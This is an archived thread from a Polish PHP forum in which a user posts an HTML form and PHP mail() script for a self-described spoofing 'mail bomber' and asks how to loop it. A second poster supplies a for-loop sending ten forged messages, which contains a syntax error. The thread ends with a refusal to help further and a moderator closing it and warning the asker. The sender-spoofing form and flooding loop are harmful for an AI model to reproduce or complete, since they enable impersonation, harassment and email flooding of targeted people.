Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: mail bomber
Forum PHP.pl > Forum > PHP
Juri
Chciałbym napisać cos w rodzaju mail bombera.
Krótkie wyjaśnienie:

Najpierw część html (formularz):

<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=iso-8859-2">
<title>Podszywacz v0.1 (2005/2006) Copuright Juri &copy</title>
<style type="text/css">
input.styled
{
border: 2px solid red;
background-color:black;
font: bold 16px Comic Sans Serif;
padding: 0px;
color:#ff5353;
}
</style>

<style type="text/css">
textarea.styled
{
border: 2px solid red;
background-color: black;
font: bold 15px Comic Sans MS>;
padding: 0px;
color:#ff5353;
}
</style>

<script language="JavaScript">
window.status=("Życzę miłej zabawy... smile.gif - Jurek Makowski");
</script>
</head>
<body bgcolor=black>

<body OnLoad="alert('Podszywacz v0.1 (2005/2006)\nProgram zaprojektował i napisał Jerzy Makowski \nJest to program o charakterze FREEWARE czyli\njest bezpłatny. Autor programu (Jerzy Makowski)\nnie ponosi żadnej odpowiedzialności, za wyrządzone\nszkody wynikające z urzytkowania tego programu. ');">

<br>
<center>
<h2><b><font color="red" face="Comic Sans MS">Podszywacz v0.1 (2005/2006)</font></b></h2>
</center>

<br>
<br>

<h5><b><font color="#336699"><center>Autor programu (Jerzy Makowski) nie ponosi żadnej odpowiedzialności, za wyrządzone<br> szkody wynikające z urzytkowania tego programu. <font color="#ffffcc">Używasz go na własną odpowiedzialnośc!!!</font></center></font></b></h5>

<br>
<form action="pod1.php" method="post">
<pre>

<b><font color="red"> ADRESAT : </font></b> <input value="Tu wpisz e-mail adresata (tego do którego ma dojść e-mail)" class="styled" name="adresat" size="58" title=" :: Tu wpisz adresata ::"/>
<b><font color="red"> NADAWCA : </font></b> <input value="Tu wpisz e-mail nadawcy ((tego pod kogo chcesz się podszyć))" class="styled" name="nadawca" size="58" title=" :: Tu wpisz nadawcę ::"/>
<b><font color="red"> TEMAT : </font></b> <input value="Tu wpisz temat e-maila (lepiej żeby nie był zbyt długi)" name="temat" size="58" class="styled" title=" :: Tu wpisz temat twojego listu ::">
<b><font color="red"> TREŚĆ : </font></b> <textarea rows=5 cols=53 value="" class="styled" title=" :: Tu wpisz treść listu ::" name="tresc">Tu wpisz treść twojego listu.</textarea>

<input type="image" src="gogo.gif">
</form>
</pre>
<center><b><font color="#ffaa95" size=1>:: &copy Copyright Jurek Makowski :: <font color="#ff7755">E-mail:</font> <a href="mailto:juri3@o2.pl"><font color="ff7755">juri3@o2.pl </font></a></font></b></center>

</body>
</html>

A teraz skrypt php:

<?php
mail($adresat, $temat, $tresc, "From: $nadawca");
?>

problem tkwi w tym że teraz ten skrypt php trzeba umiescic w petli a mi sie to nie udaje choc wiele razy juz probowałem. Prosze o pomoc. worriedsmiley.gif
gu35t
  1. <?php
  2. $ilosc = 10;
  3. for($i = 0; $i <10; $i++){
  4. mail($_POST['adresat'], $_POST['temat'], $_POST['tresc'], &#092;"From: $_POST['nadawca']\");
  5. }
  6. ?>
Juri
Wiesz co , możeszm mi podać pełen kod, bo mi coś znowu nie działa. Wyświetla błąd:
Parse error: parse error, expecting `T_STRING' or `T_VARIABLE' or `T_NUM_STRING' in c:\usr\apache\httpd\html\pod1.php on line 3.
gu35t
Cytat
możeszm mi podać pełen kod

nie

PROSZE O ZAMKNIECIE TEMATU! i na nieodpowiadanie.
NuLL
Zgodnie z prośbą. Lenistwa na forum nie tolerujemy.

A użytkownik Juri za takowe otrzymuje ostrzeżenie.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.